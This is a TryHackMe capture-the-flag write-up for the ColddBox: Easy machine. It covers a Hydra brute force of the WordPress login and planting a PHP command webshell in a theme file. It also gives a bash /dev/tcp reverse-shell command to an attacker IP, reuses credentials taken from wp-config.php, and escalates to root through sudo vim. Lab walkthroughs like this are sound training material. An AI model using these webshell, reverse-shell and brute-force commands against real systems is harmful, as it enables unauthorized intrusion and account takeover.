TryHackMe ColddBox: Easy Writeup
Room Info
- Platform: TryHackMe / VulnHub
- Room name: ColddBox: Easy
- Difficulty: Easy
- Goal: Capture user.txt and root.txt
- Link: https://tryhackme.com/room/colddboxeasy
Walkthrough
Step 1: Initial Recon - Nmap Scan
First, let's run a port scan against the target:
rustscan -a 10.201.10.88 -b 2000 -t 2000 -- -A -sV -sC
Scan results:
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.1.31
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: ColddBox | One more machine
4512/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10
Findings:
✅ HTTP (80) - Apache + WordPress 4.1.31
✅ SSH (4512) - SSH on a non-standard port
Step 2: Directory Enumeration - Discovering Hidden Users
Use Gobuster to scan for hidden directories:
gobuster dir -u http://10.201.10.88 -w /usr/share/wordlists/dirb/common.txt
Directories found:
/hidden (Status: 301) ⭐
/wp-admin (Status: 301)
/wp-content (Status: 301)
/wp-includes (Status: 301)
Visit the /hidden directory:
curl http://10.201.10.88/hidden
Content:
U-R-G-E-N-T
C0ldd, you changed Hugo's password, when you can send it to him so he can continue uploading his articles.
Philip
Key information:
💡 Three potential users identified: c0ldd, hugo, philip
💡 The note suggests c0ldd is the admin (he changed Hugo's password)
Step 3: WordPress Password Brute Force
Use Hydra to brute-force the password for the c0ldd user:
hydra -l c0ldd -P /usr/share/wordlists/rockyou.txt 10.201.10.88 \
http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&testcookie=1:F=incorrect" \
-t 16 -V -f
Brute-force in progress:
[ATTEMPT] target 10.201.10.88 - login "c0ldd" - pass "123456"
[ATTEMPT] target 10.201.10.88 - login "c0ldd" - pass "password"
...
[80][http-post-form] host: 10.201.10.88 login: c0ldd password: 9876543210
[STATUS] attack finished for 10.201.10.88 (valid pair found)
Credentials found! 🎉
💡 Credentials: c0ldd:9876543210
Step 4: Plant a Webshell via the WordPress Backend
Log in to WordPress:
http://10.201.10.88/wp-login.php
Username: c0ldd
Password: 9876543210
Once logged in, go to Appearance → Editor → 404.php
Insert a simple PHP reverse shell (at the very top of the file):
<?php
if(isset($_GET['cmd'])) {
echo "<pre>";
system($_GET['cmd']);
echo "</pre>";
}
?>
Click Update File to save.
Test command execution:
curl "http://10.201.10.88/wp-content/themes/twentyfifteen/404.php?cmd=id"
Output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Command execution achieved! ✅
Step 5: Or Get a Reverse Shell (Optional)
Start a listener on your attacking machine:
# Windows PowerShell
ncat -lvnp 4444
Trigger the reverse shell payload through the webshell:
curl "http://10.201.10.88/wp-content/themes/twentyfifteen/404.php?cmd=bash%20-c%20%27bash%20-i%20%3E%26%20/dev/tcp/YOUR_IP/4444%200%3E%261%27"
Or just visit it directly in the browser:
http://10.201.10.88/wp-content/themes/twentyfifteen/404.php?cmd=bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'
Shell obtained! 🎉
Stabilize the shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'
Step 6: Lateral Movement (www-data → c0ldd)
Explore the WordPress config file:
cat /var/www/html/wp-config.php | grep -i password
MySQL password found:
define('DB_USER', 'c0ldd');
define('DB_PASSWORD', 'cybersecurity');
Key finding:
💡 MySQL password: cybersecurity
💡 Try a password-reuse attack!
Switch to the c0ldd user:
su c0ldd
# Password: cybersecurity
It works! 🎉
whoami
# c0ldd
id
# uid=1000(c0ldd) gid=1000(c0ldd) groups=1000(c0ldd)...
Grab the user flag:
cd ~
cat user.txt
Flag content:
Redacted==
Decode the Base64:
echo "RmVsaWNpZGFkZXMsIHByaW1lciBuaXZlbCBjb25zZWd1aWRvIQ==" | base64 -d
# Felicidades, primer nivel conseguido!
# (Congratulations, first level completed!)
Step 7: Privilege Escalation (c0ldd → root)
Check sudo privileges:
sudo -l
Output:
User c0ldd may run the following commands on ColddBox-Easy:
(root) /usr/bin/vim
(root) /bin/chmod
(root) /usr/bin/ftp
Key finding:
⭐ c0ldd can run vim, chmod, and ftp via sudo
💡 All of these can be abused to escalate to root!
Escalating with vim
sudo vim -c ':!/bin/sh'
Root shell obtained! 🎉
whoami
# root
id
# uid=0(root) gid=0(root) groups=0(root)
Grab the root flag:
cd /root
cat root.txt
Flag content:
Redacted=
Decode:
echo "wqFGZWxpY2lkYWRlcywgbcOhcXVpbmEgY29tcGxldGFkYSE=" | base64 -d
# ¡Felicidades, máquina completada!
# (Congratulations, machine completed!)
Done! 🏆
Key Takeaways
1. WordPress Password Brute Force
# Hydra
hydra -l USER -P rockyou.txt TARGET \
http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:F=incorrect" -t 16 -f
# WPScan
wpscan --url http://TARGET -U USER -P rockyou.txt
2. Password Reuse Check
cat /var/www/html/wp-config.php | grep password
Lessons Learned
On Step 3: WordPress Password Brute Force
At first I used Burp Suite to brute-force out hugo and philip, and I hadn't found the /hidden path at all. After brute-forcing for a while with no luck, I went back to hunt for more information — I remembered that these are the usual WordPress paths, so you have to adjust your approach depending on the situation.
On Step 7: Privilege Escalation (c0ldd → root)
There are actually several privilege-escalation methods here — feel free to try them all! For details, check out:


Member discussion